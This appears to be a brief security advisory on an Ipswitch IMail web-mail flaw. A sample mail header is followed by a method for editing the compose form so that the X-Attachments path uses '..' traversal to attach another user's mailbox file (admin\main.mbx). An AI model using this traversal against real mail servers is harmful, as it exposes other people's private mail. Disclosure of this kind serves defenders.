IPSWITCH IMail File Attachment Vulnerability

Here is a sample mail header sent by IMAIL web services which
has an attachment. Please note that this is line wrapped for readability.

Date: Tue, 11 Jul 2000 13:10:28 +0200
Message-ID: <200007111310.AA2374238664@bar.com>
MIME-Version: 1.0 Content-Type: multipart/mixed;
From: "Timescape" <foo@bar.com>
Reply-To: <foo@bar.com>
To: <foo@bar.com>
Subject: test
X-Mailer: <IMail v5.01>
X-Attachments: D:\IMAIL\spool\gonzo2.jpg ;
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Return-Path: <foo@bar.com>
X-OriginalArrivalTime: 11 Jul 2000 11:20:48.0256 (UTC) FILETIME=[10327800:01BFEB2A]

This is a multi-part message in MIME format.

Content-Type: text/plain;
Content-Transfer-Encoding: 7bit

Content-Type: application/octet-stream;
name="gonzo2.jpg "
Content-Transfer-Encoding: base64


The thing which we will be exploiting is the
X-Attachments: D:\IMAIL\spool\gonzo2.jpg ;

I made it work by modifing the compose message HTML file and
saved it locally. Then i can just arrange the path to the
attachment so that it can read

X-Attachments: D:\IMAIL\spool\..\bar\users\admin\main.mbx ;


Privacy Statement
Copyright 2010, SecurityFocus